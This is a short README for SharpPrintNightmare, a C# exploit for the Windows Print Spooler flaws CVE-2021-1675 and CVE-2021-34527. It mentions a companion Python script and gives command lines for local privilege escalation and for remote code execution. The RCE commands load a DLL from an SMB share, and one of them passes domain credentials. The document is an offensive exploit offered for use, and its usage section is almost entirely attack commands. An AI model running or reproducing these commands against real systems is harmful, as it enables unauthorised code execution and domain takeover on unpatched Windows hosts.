# C# Implementation of CVE-2021-1675 / CVE-2021-34527 ### Update New `CVE-2021-1675.py` has been uploaded which will get the same result as the C# version No longer need to manually specify pConfigFile with C# version ### Usage The RCE functionality might need to be executed with local administrator privileges on YOUR machine. ``` #LPE C:\SharpPrintNightmare.exe C:\addCube.dll #RCE using existing context SharpPrintNightmare.exe '\\\smb\addCube.dll' '\\' #RCE using runas /netonly SharpPrintNightmare.exe '\\\smb\addCube.dll' '\\' hackit.local domain_user Pass123 ``` ![](../Images/poc4.png) ![](../Images/poc3.png) ### Acknowledgements For contributing new ideas or exploit improvements, thanks to * [kiqrx](https://www.hackthebox.eu/home/users/profile/72916)